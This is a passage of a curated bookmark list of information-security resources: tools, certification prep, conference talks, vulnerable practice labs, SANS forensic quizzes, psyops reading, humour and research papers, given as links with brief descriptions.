- [PAN-OS GlobalProtect Portal Scanner](https://github.com/noperator/panos-scanner): Determine the Palo Alto PAN-OS software version of a remote GlobalProtect portal or management interface.
- [Thomas Roccia's #100DaysOfCode challenge](https://medium.com/@tom_rock/100daysofcode-challenge-8915947cc6b9#8b25): IDA pro and a lot of another things.
- [Audi A7 2014 MMI Mishandles the Format-string Specifiers](https://tiger-team-1337.blogspot.com/2020/10/audi-a7-2014-mmi-mishandles-format.html)
- (pt-br) [BoF + Sockets + Erros de Codificação com o Python3](https://diegoalbuquerque.github.io/bof-socket-python3.html)
- [Yet another SIP003 plugin for shadowsocks, based on v2ray](https://github.com/shadowsocks/v2ray-plugin): A SIP003 plugin based on v2ray
- [Information Security related Mind Maps](http://www.amanhardikar.com/mindmaps.html)
- [List of Rainbow Tables](https://project-rainbowcrack.com/table.htm)
- [Do you hear what I hear? A cyberattack.](https://www.cylab.cmu.edu/news/2021/07/30-sonification.html): CyLab’s Yang Cai is turning network traffic data into music.
- [Ghost in the ethernet optic](https://blog.benjojo.co.uk/post/smart-sfp-linux-inside): A few months ago I stumbled on a tweet pointing out a kind of SFP optic that claimed to be smart, made by a Russian company Plumspace.

### Configs

- [Kali-Customizations](https://github.com/IppSec/Kali-Customizations)

---

## Resources

- [13 Best New Software Security Books To Read In 2021](https://bookauthority.org/books/new-software-security-books)
- [pwn.college](https://pwn.college/) is a first-stage education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. It is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. The philosophy of pwn.college is “practice makes perfect”.
- ['pwnable.kr'](https://pwnable.kr/) is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. the main purpose of pwnable.kr is 'fun'.
- [Pwnable.tw](https://pwnable.tw/) is a wargame site for hackers to test and expand their binary exploiting skills.
- [Security Zines](https://securityzines.com/#comics): graphical way of learning concepts of Application & Web Security.

### Training and Certifications

- [OSWE](https://github.com/timip/OSWE): OSWE Preparation.
- [AWAE/OSWE](https://github.com/ManhNho/AWAE-OSWE/): Preparation for coming AWAE Training.
- [AWAE-PREP](https://github.com/wetw0rk/AWAE-PREP): This repository will serve as the "master" repo containing all trainings and tutorials done in preperation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses.
- [offsec_WE](https://github.com/sailay1996/offsec_WE): learning case to prepare OSWE
- [AWAE-Preparation](https://github.com/M507/AWAE-Preparation): This repository will contain all trainings and tutorials I have done/read to prepare for OSWE / AWAE.
- [From AWAE to OSWE: The Preperation Guide](https://hansesecure.de/2019/08/from-awae-to-oswe-the-preperation-guide/?lang=en)
- [Awesome Infosec](https://github.com/onlurking/awesome-infosec): A curated list of awesome infosec courses and training resources.
- [Security Certification Progress Chart](https://twitter.com/Marmusha/status/1222810038898712576/photo/1)
- [study material used for the 2018 CISSP exam](https://github.com/so87/CISSP-Study-Guide), [site](https://simonowens157.gitlab.io/cissp/)
- [JustTryHarder](https://github.com/sinfulz/JustTryHarder): a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings).
- [Hacking Your Pen Testing / Red Teaming Career: Part 1](https://medium.com/munrobotic/hacking-your-pen-testing-red-teaming-career-part-1-cc816aca0980)
- [PentesterAcademy](https://www.pentesteracademy.com/): Courses and Online Labs.
- [OSCE-exam-practice](https://github.com/epi052/OSCE-exam-practice), [OSCE Exam Practice - Part IX (LTER via SEH Overwrite w/ Restricted Character Set)](https://epi052.gitlab.io/notes-to-self/blog/2020-05-25-osce-exam-practice-part-nine/)
- [RED TEAM Operator: Malware Development Essentials Course](https://institute.sektor7.net/red-team-operator-malware-development-essentials) and [RED TEAM Operator: Malware Development Intermediate Course](https://institute.sektor7.net/rto-maldev-intermediate)
- [OSCP Journey](https://diesec.home.blog/2020/10/11/oscp-journey/)
- [Hacking Dojo](https://becodoexploit.com/HackingDojo/)
- [Learning from your mistakes as an offensive security professional](https://ualvesdias.medium.com/learning-from-your-mistakes-as-an-offensive-security-professional-e1001452977d)
- [Burp Suite Academy](https://www.deepfryd.com/burp-academy-apprentice/)
- [The Ultimate List of SANS Cheat Sheets](https://www.sans.org/blog/the-ultimate-list-of-sans-cheat-sheets/)
- [Posters: Pen Testing](https://www.sans.org/security-resources/posters/pen-testing)
- [#OSCP exam advice thread.](https://twitter.com/rana__khalil/status/1283578422904664065)
- [Targeted Malware Reverse Engineering Workshop](https://www.brighttalk.com/webcast/15591/477861)
- [OpenSecurity](https://opensecurity.in/): We do quality pentests, security engineering, security training and we ♥ OpenSource.
- [OPSEC: In Theory and Practice](https://learn.opsec.institute/courses/opsec-in-theory-and-practice): Learn OPSEC through historical examples. This introductory course covers OPSEC concepts, theory, and application. You will learn how to critically assess security advice, and how to differentiate between good and bad OPSEC.
- [opsec](https://github.com/CATx003/opsec): Counter Surveillance and OPSEC research.
- [Guide-CEH-Practical-Master](https://github.com/CyberSecurityUP/Guide-CEH-Practical-Master)
- [Understand Kerberos Delegation, Active Directory Security Descriptors, Windows Lateral Movements, etcc.](https://attl4s.github.io/)
- [Free Incident Response Training Plan](https://freetraining.dfirdiva.com/free-ir-training-plan) and [Part 2: Free Training Plan for New Incident Responders](https://freetraining.dfirdiva.com/free-ir-training-plan-part-two). [BaselineTraining](https://github.com/rj-chap/BaselineTraining): Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk.
- [CyberDefenders](https://cyberdefenders.org/) is a training platform focused on the defensive side of cybersecurity, aiming to provide a place for blue teams to practice, validate the skills they have, and acquire the ones they need.
- (pt-br) [OSCP — Meu caminho até a terra prometida.](https://lfgrillo83.medium.com/oscp-meu-caminho-at%C3%A9-a-terra-prometida-844f029f3e22)
- [psylinux](https://github.com/psylinux/Presentations)
- [How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt](https://infosecwriteups.com/how-i-passed-oscp-with-100-points-in-12-hours-without-metasploit-in-my-first-attempt-dc8d03366f33)
- [SOC Core Skills w/ John Strand](https://www.antisyphontraining.com/soc-core-skills-w-john-strand/)
- [awesome-cyber-skills](https://github.com/joe-shenouda/awesome-cyber-skills): A curated list of hacking environments where you can train your cyber skills legally and safely.

### Conferences and Slides

- [H2HC](https://www.h2hc.com.br/) - Hackers To Hackers Conference:
- [H2HC 2017](https://github.com/h2hconference/2017): H2HC 2017 Slides/Materials/Presentations
- [H2HC 2018](https://github.com/h2hconference/2018): Slides/Materials/Presentations
- [JavaDeserH2HC](https://github.com/joaomatosf/JavaDeserH2HC): Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).
- [H2HC 2021](https://www.h2hc.com.br/revista/RevistaH2HC_15.pdf)
- CCC:
- [Modchips of the State](https://media.ccc.de/v/35c3-9597-modchips_of_the_state#t=22): Hardware implants in the supply-chain - CCC 2018
- BlackHat:
- 2014 Keynote: [Cybersecurity as Realpolitik](https://duo.com/blog/black-hat-2014-keynote-cybersecurity-as-realpolitik), amazing keynote by Dan Geer (Geertinho)
- [Kudelski Security's 2018 pre-Black Hat crypto challenge](https://github.com/kudelskisecurity/cryptochallenge18)
- 2018: [Expert demonstrated a new PHP code execution attack](https://securityaffairs.co/wordpress/75419/hacking/php-code-execution-attack.html)
- 2021:
- [supply chain issues talk](https://twitter.com/dcuthbert/status/1422956541544734720)
- [MFA-ing the Un-MFA-ble: Protecting Auth Systems' Core Secrets](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-MFA-Ing-The-Un-MFA-Ble-Protecting-Auth-Systems-Core-Secrets.pdf). [tal be'ery](https://twitter.com/TalBeerySec/status/1422986325234491396/photo/1)
- DEFCON:
- 2018: [Doublethink](https://www.robertxiao.ca/hacking/defcon2018-assembly-polyglot/): 8-Architecture Assembly Polyglot by Robert Xiao
- 2020: [SAFEMODE](https://www.defcon.org/html/defcon-safemode/dc-safemode-index.html), [VILLAGES](https://www.defcon.org/html/defcon-safemode/dc-safemode-villages.html), [BADGE](https://www.defcon.org/html/defcon-safemode/dc-safemode-badge.html), [ics-forum](https://forum.defcon.org/node/232698)
- 2021:
- [OpenSOC Blue Team CTF @ DEFCON 29 FAQ](https://docs.google.com/document/d/13VuTyytIOtuazPHWRCOBGVB5ZBcgAvLvicrQv0WMdPo/edit)
- [Using Barq to perform AWS Post-Exploitation Actions](https://twitter.com/cloudvillage_dc/status/1424086510245093376) [Terraform hacking talk](https://twitter.com/mazen160/status/1423344846526369793/photo/1)
- [SBSeg 2018](http://portaldeconteudo.sbc.org.br/index.php/sbseg): Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais (SBSeg)
- Objective by the Sea (2018):
- [APFS Internals](https://objectivebythesea.com/talks/OBTS_v1_Levin.pdf) - Jonathan Levin
- [Protecting the Garden of Eden](https://objectivebythesea.com/talks/OBTS_v1_Wardle.pdf) - Patrick Wardle
- [Code signing flaw in macOS](https://objectivebythesea.com/talks/OBTS_v1_Reed.pdf) - Thomas Reed
- [From Apple Seeds to Apple Pie](https://objectivebythesea.com/talks/OBTS_v1_Edwards.pdf) - Sarah Edwards
- [When Macs Come Under ATT&CK](https://objectivebythesea.com/talks/OBTS_v1_Cyrus.pdf) - Richie Cyrus
- [Crashing to Root](https://objectivebythesea.com/talks/OBTS_v1_Azad.pdf) - Bradon Azad
- [Leveraging Apple's Game Engine for Advanced Threat Detection](https://objectivebythesea.com/talks/OBTS_v1_Malm_Stein.pdf) - Josh Stein / Jon Malm
- [MacDoored](https://objectivebythesea.com/talks/OBTS_v1_Bradley.pdf) - Jaron Bradley
- [Who Moved my Pixels?](https://objectivebythesea.com/talks/OBTS_v1_Sosonkin.pdf) - Mikahail Sosonkin
- [Aliens Among Us](https://objectivebythesea.com/talks/OBTS_v1_Lynn.pdf) - Michael Lynn
- BlackHoodie 2018 Workshop: [An Introduction To Binary Exploitation](https://github.com/tharina/BlackHoodie-2018-Workshop)
- [r2con2020](https://rada.re/con/) [stuff](https://github.com/radareorg/r2con2020)
- [workshop: semi-automatic code deobfuscation](https://github.com/mrphrazer/r2con2020_deobfuscation)
- [r2con2020 DAY3 Live Stream](https://www.youtube.com/watch?v=A9wodVpSFds)
- [hack.lu](https://hack.lu):
- [MISP Summit 05](https://2019.hack.lu/misp-summit/): MISP Threat Intelligence Summit 0x05 at hack.lu 2019. Practical threat intelligence and information sharing for everyone.
- [Hack.lu 2019 Day #1 Wrap-Up](https://blog.rootshell.be/2019/10/22/hack-lu-2019-day-1-wrap-up/)
- [The Open Source Security Software](https://hackathon.hack.lu/) [Hackathon](https://github.com/CIRCL/hackathon)
- [Hack.lu 2021 Stonks Socket](https://mem2019.github.io/jekyll/update/2021/10/31/HackLu2021-Stonks-Socket.html)
- [How to R&D hacking toys for fun & no-profit](https://troopers.de/downloads/troopers19/TROOPERS19_NGI_RT_Hacking_Toys_For_Fun.pdf)
- [Security Guidelines for Congressional Campaigns](https://techsoliRdarity.org/resources/congressional_howto.html)
- [From Assembly to JavaScript and back](https://github.com/rh0dev/slides/blob/master/OffensiveCon2018_From_Assembly_to_JavaScript_and_back.pdf) (OffensiveCon2018)
- [ARM-based IoT Exploit Development](https://hardwaresecurity.training/trainings/arm-west-2018/)
- (pt-br)[Uma Introdução a Threat Intelligence e Threat Hunting para Empresas Sem Orçamento Infinito](https://www.slideshare.net/AlexandreSieira/uma-introduo-a-threat-intelligence-e-threat-hunting-para-empresas-sem-oramento-infinito)
- Outflank [Presentations](https://github.com/outflanknl/Presentations)
- [The Art of De-obfuscation](https://speakerdeck.com/ntddk/the-art-of-de-obfuscation)
- [Smartphone Privacy](https://conference.hitb.org/hitbsecconf2018pek/materials/D2T2%20-%20How%20Your%20Smartphone%20Tracks%20Your%20Entire%20Life%20-%20Vladimir%20Katalov.pdf): How Your Smartphone Tracks Your Entire Life
- [Fun with LDAP and Kerberos- in AD environments](https://speakerd.s3.amazonaws.com/presentations/1ddba788017347ff8cfdb3336204fd17/FunWithLDAPandKerberos_Flathers_Thotcon2018_05052018.pdf)
- [Analysis and recommendations for standardization in penetration testing and vulnerability assessment](http://eprints.lancs.ac.uk/74275/1/Penetration_testing_online_2.pdf)
- [The Second Crypto War—What's Different Now](https://www.usenix.org/conference/usenixsecurity18/presentation/landau) (by Susan Landau, Bridge Professor of Cyber Security and Policy, Tufts University)
- [Malware: Anti-forensics](http://www.blackstormsecurity.com/docs/BHACK_2018.pdf)
- [The 35C3 halfnarp](https://halfnarp.events.ccc.de/)
- [SeL4-Enabled Security Mechanisms for Cyber-Physical Systems](https://www.sel4-us.org/summit/presentations/Session_4_Talk_2_Payton_Nogin_HRL.pdf)
- [Mojave's Sandbox is Leaky](https://www.youtube.com/watch?v=sW2zlW7lMjM)
- [Code Obfuscation 10**2+(2*a+3)%2](https://www.synacktiv.com/ressources/jsecin_code_obfu.pdf)
- [DeepState](http://www.petergoodman.me/docs/secdev-2018-slides.pdf): Bringing vulnerability detection tools into the development lifecycle, [paper](http://www.petergoodman.me/docs/bar-2018-paper.pdf): DeepState: Symbolic Unit Testing for C and C++
- [Hardware Memory Tagging to make C/C++ memory safe(r)](https://github.com/google/sanitizers/blob/master/hwaddress-sanitizer/Hardware%20Memory%20Tagging%20to%20make%20C_C%2B%2B%20memory%20safe%28r%29%20-%20iSecCon%202018.pdf)
- [wallet.fail](https://media.ccc.de/v/35c3-9563-wallet_fail#t=1152): Hacking the most popular cryptocurrency hardware wallets
- [Reverse Engineering](https://docs.google.com/presentation/d/1ljVUiXVi2PfEdolGXr7Wpepj0x2RxaOo9rzMKWXebG4/mobilepresent?slide=id.p): Closed, heterogeneous platforms and the defenders’ dilemma Looking back at the last 20 years of RE and looking ahead at the next few SSTIC 2018 -- Thomas Dullien (“Halvar Flake”)
- [Making C Less Dangerous in the Linux kernel](https://2019.linux.conf.au/schedule/presentation/178/)
- [Workshop-BSidesMunich2018](https://github.com/invictus1306/Workshop-BSidesMunich2018): ARM shellcode and exploit development - BSidesMunich 2018
- [REhint's Publications](https://github.com/REhints/Publications).
- [INFILTRATE 2019 Demo Materials](https://github.com/0xAlexei/INFILTRATE2019)
- [A Practical Approach to Purple Teaming](http://www.irongeek.com/i.php?page=videos/showmecon2019/showmecon-2019-00-a-practical-approach-to-purple-teaming-matt-thelen)
- [The Advanced Threats Evolution: REsearchers Arm Race](https://github.com/REhints/Publications/tree/master/Conferences/OFFZONE'2019) by @matrosov
- [The Beginner Malware Analysis Course + VirusBay Access](https://0verfl0w.podia.com/beginner-analysis-course-vb-access)
- [ConPresentations](https://github.com/maddiestone/ConPresentations) by Maddie Stone.
- [Venturing into the Dark](https://gist.github.com/lystena/eb0bb2489c70974b685ac01de770c429)- a review of Dark Side Ops 2: Adversary Simulation
- [Expert voices disinvited from CyberCon](https://censorcon.net/)
- [0x0g-2018-badge](https://github.com/google/0x0g-2018-badge).
- [Virtual Cybersecurity Conferences](https://github.com/santosomar/virtualseccons): An ongoing list of virtual cybersecurity conferences.
- [The speaker and schedule data for GrayHat to populate Hacker Tracker and the main GrayHat website.](https://github.com/Grayhat-Co/hacker-tracker-data)
- [Offensive Development](https://github.com/mdsecresearch/Publications/blob/master/presentations/Offensive%20Development%20-%20Post-Exploitation%20Tradecraft%20in%20an%20EDR%20World%20-%20x33fcon%202020.pdf): Post-Exploitation Tradecraft in an EDR World x33fcon 2020
- [WebSploit Labs workshop hosted by the Red Team Village during YASCON](https://github.com/santosomar/YASCON)
- [The AVAR International Conference is back!](https://aavar.org/avar2020/index.php/agenda/)
- [Japan Security Analyst Conference Virtual Edition](https://jsac.jpcert.or.jp/index.html)
- [{baby,mama,gran}-a-fallen-lap-ray DEFCON 2021 Quals](https://github.com/o-o-overflow/dc2021q-a-fallen-lap-ray)
- [Developing Secure Systems Summit (DS3)](https://ds3summit.github.io/): The state of the art in developing secure computer systems is advancing rapidly, with progress in several communities around the world spanning the software industry, academia, research labs, and governments.
- [MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE](http://www.blackstormsecurity.com/docs/HITB_AMS_2019.pdf) HITBSecConf2019 -Amsterdam
- [PoC demo for HITB Amsterdam 2021](https://github.com/ssteo/hitbsecconf2021ams-poc): Playing hide-n-seek with AWS GuardDuty: Post-DNS era covert channel for C&C and data exfiltration.
- [Securing Cyber-Physical Systems: moving beyond fear](https://www.sstic.org/media/SSTIC2021/SSTIC-actes/ouverture_2021/SSTIC2021-Slides-ouverture_2021-zanero.pdf)
- [Speaking materials from conferences](https://github.com/tim-scythe/conference-materials) by Tim Scythe
- [TheGlasshouseCtr](https://www.twitch.tv/videos/1088483736)
- [Open Source Security Day on Google Open Source Live](https://opensourcelive.withgoogle.com/events/security)
- [hardik05](https://github.com/hardik05/Conferences): My conference presentations and Materials for them.
- [30th USENIX Security Symposium](https://2459d6dc103cb5933875-c0245c5c937c5dedcca3f1764ecc9b2f.ssl.cf2.rackcdn.com/sec21/sec21_full_proceedings.pdf)
- [The Hijackers Guide to the Galaxy:Off-path Taking over Internet Resources](https://storage.googleapis.com/site-media-prod/meetings/NANOG83/2401/20211102_Dai_The_Hijackers_Guide_v1.pdf)

### Sans

- Quiz:
- [April 2021 Forensic Quiz](https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz/27266/) [repo](https://github.com/brad-duncan/April-2021-forensic-quiz)
- [May 2021 Forensic Contest](https://isc.sans.edu/forums/diary/May+2021+Forensic+Contest/27386/) [repo](https://github.com/brad-duncan/May-2021-forensic-quiz) [answer](https://isc.sans.edu/forums/diary/May+2021+Forensic+Contest+Answers+and+Analysis/27430/)
- [June 2021 Forensic Contest](https://isc.sans.edu/forums/diary/June+2021+Forensic+Contest/27532/), [June-2021-forensic-quiz](https://github.com/brad-duncan/June-2021-forensic-quiz) [Network Forensics on Azure VMs (Part #2)](https://isc.sans.edu/forums/diary/Network+Forensics+on+Azure+VMs+Part+2/27538/).
- [Quick Analysis of a Modular InfoStealer](https://isc.sans.edu/forums/diary/Quick+Analysis+of+a+Modular+InfoStealer/27264/)
- [Example of Cleartext Cobalt Strike Traffic](https://isc.sans.edu/diary/27300)
- [SEC642 papers](https://github.com/SEC642/SEC642_papers): This repository is a collection of papers used in the course that has been deprecated on the wide internet.
- ["Serverless" Phishing Campaign](https://isc.sans.edu/forums/diary/Serverless+Phishing+Campaign/27446/)
- [SANS CTI Summit 2021](https://github.com/sfakiana/SANS-CTI-Summit-2021)
- [SANS Virtual Summits Will Be FREE for the Community in 2021](https://www.sans.org/blog/sans-virtual-summits-free-2021/)
- [Random Forests: Still Useful?](https://twitter.com/i/broadcasts/1mrGmaVpqWqGy)

## psyops

- [Read the Pentagon’s 20-Page Report on Its Own Meme](https://www.vice.com/en/article/v7m9dy/read-the-pentagons-20-page-report-on-its-own-meme)
- [Bezmenov’s Steps (Ideological Subversion)](https://unintendedconsequenc.es/bezmenovs-steps/)
- [PAUL LAZARSFELD—THE FOUNDER OF MODERN EMPIRICAL SOCIOLOGY: A RESEARCH BIOGRAPHY](https://ropercenter.cornell.edu/sites/default/files/pdf/130229.pdf)
- [Influence Operations 101 - Media Effects](http://forces.systems/io/tutorials/influenceops101/index.html) [video](https://www.youtube.com/watch?v=udNfOWi153g)
- [Hazard Mapping](https://medium.com/mule-design/hazard-mapping-e0b99b7ebd29): The information architecture of ethics, a draft proposal
- [Cognitive Warfare](https://www.innovationhub-act.org/sites/default/files/2021-01/20210122_CW%20Final.pdf)

---

## Sources

Some good places to visit:

- [hasherezade's 1001 nights](https://hshrzd.wordpress.com)
- [How to start RE/malware analysis? | hasherezade's 1001 nights](https://hshrzd.wordpress.com/how-to-start/)
- [List of Helpful Information Security Multimedia](https://github.com/1337list/ephemera-miscellany/blob/master/hackertalkytalk.md)
- [pocorgtfo](https://github.com/angea/pocorgtfo): a "PoC or GTFO" mirror with extra article index, direct links and clean PDFs.
- [FIDO ECDAA Algorithm](https://fidoalliance.org/specs/fido-v2.0-id-20180227/fido-ecdaa-algorithm-v2.0-id-20180227.html#ecdaa-sign)
- [stamparm](https://github.com/stamparm): Miroslav Stampar Repositories (a lot of good stuff)
- Github repos:
- [gabrielmachado](https://github.com/gabrielmachado/)
- Damn Vulnerable Web Application:
- [Damn Vulnerable Web Application Docker container](https://hub.docker.com/r/vulnerables/web-dvwa/)
- [Damn Vulnerable Web Application (DVWA)](https://github.com/ethicalhack3r/DVWA)
- [Damn Vulnerable C Program](https://github.com/hardik05/Damn_Vulnerable_C_Program): a c program containing vulnerable code for common types of vulnerabilities, can be used to show fuzzing concepts.
- [vvmlist](https://vvmlist.github.io/): vulnerable virtual machine list is a list of vulnerable vms with their attributes.
- Nelson Brito's [Source](https://github.com/nbrito/source): This repository is a collection of information, code and/or tool, which I've released and/or presented in some of the most notorious conferences, helping the audience to study and understand some cybersecurity related topics.
- (pt-br)[PwnLab: init](https://lcesteves.wordpress.com/2018/11/24/pwnlab-init-writeup/)
- [Mamont's open FTP Index](http://www.mmnt.net/): a lot of open FTPs!!!
- [fuzz.txt](https://github.com/Bo0oM/fuzz.txt): Potentially dangerous files
- [Free Training: New Certified Learning Paths](https://blog.qualys.com/news/2019/03/18/free-training-new-certified-learning-paths): The Qualys Training team is eager to share all of the recent additions to our free training program, as well as provide insight into what is coming in 2019. You can expect to see regular updates as we continue to improve our training offerings!
- (pt-br)[Catálogo de Fraudes](https://www.rnp.br/sistema-rnp/cais/catalogo-de-fraudes): Lançado em 2008 para alertar a comunidade de ensino e pesquisa sobre os principais golpes em circulação na internet, o nosso Catálogo de Fraudes é hoje um repositório importante de mensagens classificadas como fraudulentas, que serve como fonte de informação para todo o Brasil.
- [Daily Information Security Podcast ("StormCast")](https://isc.sans.edu/podcast.html)
- [Hackerrank](https://github.com/AnuragAnalog/hackerrank): Contains codes for some of the solutions to Hacker-rank problems
- [I may have found Omega Weapon: One Powerful, Terrifying Monster Forming the Upper Reaches of Another, Much More Powerful & Terrifying Monster](https://medium.com/@hackermaderas/the-beginning-of-one-hackers-thoroughly-referenced-evidenced-osint-investigation-of-clearview-ai-1aa2e9109492). #CyberpunkisNow is a project producing Digital Privacy/Anonymity, Counter-Surveillance, Hacking, Technology, Information Security/Cyber Security, Science & Open Source Intelligence content meant to educate, establish/maintain a public dialogue & create awareness regarding the ways technology continues to permeate civilization.
- [Exodus Research Community](https://rsp.exodusintel.com/)
- [2021 Annual Threat Assessment](https://www.dni.gov/files/ODNI/documents/assessments/ATA-2021-Unclassified-Report.pdf) of the us intelligence community.
- [Hamid's Bookmarks](https://github.com/Hamid-K/bookmarks)
- DARKNET DIARIES: [EP 67: THE BIG HOUSE](https://darknetdiaries.com/episode/67/)
- [Wrong Secrets](https://github.com/commjoen/wrongsecrets): Examples with how to not use secrets.
- [Vulnserver](https://github.com/stephenbradshaw/vulnserver): Vulnerable server used for learning software exploitation.

---

## Fun

- [Spoilerwall introduces a brand new concept in the field of network hardening](https://github.com/infobyte/spoilerwall)
- [abusing github commit history for the lulz](https://github.com/gelstudios/gitfiti)
- [resist_oped](https://github.com/mkearney/resist_oped/): 🕵🏽‍♀️ Identifying the author behind New York Time’s op-ed from inside the Trump White House.
- [InfoSec BS Bingo](https://www.bullshitbingo.net/cards/custom/?title=InfoSec+BS+Bingo&exclamation=CYBERWAR+%21%21%21&free_square=&terms=Cyber%0D%0AChina%0D%0ABillion%0D%0AAPT%0D%0ANation+State%0D%0AGovernment%0D%0APCI%0D%0AWe+are+compliant%0D%0A%24Vendor+claimed%0D%0AAdvanced+Malware%0D%0ASCADA%0D%0AStuxnet+%0D%0ARussia%0D%0ABreach%0D%0AMillion+Records%0D%0ACyberwar%0D%0AInternet+of+Things%0D%0AMimikatz%0D%0AHacker%0D%0AVPN%0D%0ASQL+Injection%0D%0ACredentials%0D%0AEncrypted+passwords%0D%0ANo+financial+data%0D%0ASnowden)
- [How to fit all of Shakespeare in one tweet (and why not to do it!)](https://nakedsecurity.sophos.com/2018/11/12/how-to-fit-all-of-shakespeare-in-one-tweet-and-why-not-to-do-it/)
- [Attrition.org](http://attrition.org/security/rant/z/dc/results.txt): defacement rank.
- [rot8000](http://rot8000.com/Index): rot13 for the Unicode generation ([github](https://github.com/rottytooth/rot8000))
- [Reverse Engineering Pokémon GO Plus](https://tinyhack.com/2018/11/21/reverse-engineering-pokemon-go-plus/): TL;DR; You can clone a Pokemon GO Plus device that you own. [pgpemu](https://github.com/yohanes/pgpemu): github repo.
- [grugq quotes](https://gist.github.com/0xdabbad00/18c4743455022109e69cca1de11e9cb6)
- [Pivots & Payloads Board Game](https://www.sans.org/webcasts/introducing-pen-test-poster-pivots-payloads-board-game-109505): Introducing the NEW SANS Pen Test Poster by SANS Institute
- [Chess Steganography](https://incoherency.co.uk/chess-steg/)
- [Enigma, the Bombe, and Typex](https://github.com/gchq/CyberChef/wiki/Enigma,-the-Bombe,-and-Typex)
- (pt-br) [Ícone da criptografia na 2ª Guerra Mundial, máquina Enigma tem exemplar no Brasil](https://revistagalileu.globo.com/Sociedade/Historia/noticia/2019/09/icone-da-criptografia-na-2-guerra-mundial-maquina-enigma-tem-exemplar-no-brasil.html)
- [Enigma machine](https://observablehq.com/@tmcw/enigma-machine): This is a simulated Enigma machine. Letters to be encrypted enter at the boundary, move through the wire matrix, and exit.
- [How I hacked modern Vending Machines](https://hackernoon.com/how-i-hacked-modern-vending-machines-43f4ae8decec)
- [A better zip bomb](https://www.bamsoftware.com/hacks/zipbomb/)
- [Goodbye-World](https://github.com/datacorruption/Goodbye-World): The last program that every developer writes.
- [Dumb Password Rules](https://github.com/dumb-password-rules/dumb-password-rules)
- [Enigma I](https://enigma.lh.mk/), Navy M3/M4 [Machine Emulator](https://github.com/lubeskih/enigma-emulator).
- [FYI, I'm going to drive home on Florida's Turnpike with a code that QR-enabled license plate readers will log in their ASCII databases ... which could trigger #antivirus software to QUARANTINE those databases](https://twitter.com/vmyths/status/1212201412068818944) by Rob Rosenberger.
- (pt-br)[pivoting](https://diegoalbuquerque.github.io/pivoting.html) [offensivetools](https://github.com/diegoalbuquerque/offensivetools)
- [Posters, drawings...](https://github.com/corkami/pics)
- ["Other good cyberpunk media to stream free on Tubi: Akira https://t.co/zNFOXzkdMP Ghost in the Shell https://t.co/ayGKJsGXsf Jin-Roh https://t.co/V6KUA0icSc Ergo Proxy https://t.co/uQv9WNGnHT AD Police https://t.co/UNBioD26MB Chappie https://t.co/YmLabtxk4z"](https://twitter.com/hackermaderas/status/1328153549411414018)
- [THE BEIRUT BANK JOB](https://darknetdiaries.com/episode/6/)
- [BitmapFonts](https://github.com/ianhan/BitmapFonts): My collection of bitmap fonts pulled from various demoscene archives over the years
- XKCD [types of papers](https://xkcd.com/2456/): [Disinformation](https://twitter.com/CindyOtis_/status/1389572647361687553/photo/1),
- [Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data.](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32471)
- [How the Xbox 360 DVD Security was Defeated](https://www.youtube.com/watch?v=bw_B3lQxOps) and [How the Xbox 360 Hypervisor Security was Defeated](https://www.youtube.com/watch?v=Vq1lxeg_gNs) - MVG
- [I was going through my notes this morning and thought CVE-2021-21985 was important to cover](https://twitter.com/ParkinsonFrost/status/1404827748712042498)
- [APPSEC EZINE](https://pathonproject.com/zb/?da0fdd7f7fd0d09c#bod4fYcp6Zbxi3iRKuTDAGQgWNFHbJ/JwPjWjd/Veaw=)
- [ZeroVer: 0-based Versioning](https://0ver.org/zerover_0_based_versioning.html)
- [The Cartoon Guide to Computer Science](https://br1lib.org/book/1060421/12ebe5?id=1060421&secret=12ebe5)
- [LENS CALCULATOR](https://www.jvsg.com/calculators/cctv-lens-calculator/): alculate CCTV camera lens focal length, pixel density and camera zones in 3D
- [Awesome Piracy](https://github.com/Igglybuff/awesome-piracy): A curated list of awesome warez and piracy links.
- [An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1](https://gist.github.com/matt-/c3028fa85d2d4f599351344ea7502865)
- [What is von Clausewitz centers of gravity (cogs) concept?](https://twitter.com/DefenseCharts/status/1453365618191704072/photo/1)
- [Place that a stealth figther was caught on gmaps](https://goo.gl/maps/Jn8KZMaQTBvYUpyo8)
- [High-Security Mechanical Locks](https://swiftsilentdeadly.com/high-security-mechanical-locks/)
- [Tetsuji](https://xcellerator.github.io/posts/tetsuji/): Remote Code Execution on a GameBoy Colour 22 Years Later
- [KeyDecoder](https://github.com/MaximeBeasse/KeyDecoder) app lets you use your smartphone or tablet to decode your mechanical keys in seconds.
- [Comparative Study of Anti-cheat Methods in Video Games](https://helda.helsinki.fi/bitstream/handle/10138/313587/Anti_cheat_for_video_games_final_07_03_2020.pdf) by Samuli Lehtonen

---

## Articles

- [[1808.00659] Chaff Bugs: Deterring Attackers by Making Software Buggier](https://arxiv.org/abs/1808.00659)
- [[1809.08325] The Rise of Certificate Transparency and Its Implications on the Internet Ecosystem](https://arxiv.org/abs/1809.08325)
- [DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution](https://arxiv.org/abs/1705.07386)
- [Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities](https://www.cc.gatech.edu/~slee3036/papers/lee:gpu.pdf)
- [The Hunt for 3ve](https://services.google.com/fh/files/blogs/3ve_google_whiteops_whitepaper_final_nov_2018.pdf): Taking down a major ad fraud operation through industry collaboration.
- [Page Cache Attacks](https://arxiv.org/abs/1901.01161): We present a new hardware-agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache.
- [Identification and Illustration of Insecure Direct Object References and their Countermeasures](https://www.researchgate.net/publication/307580906_Identification_and_Illustration_of_Insecure_Direct_Object_References_and_their_Countermeasures)
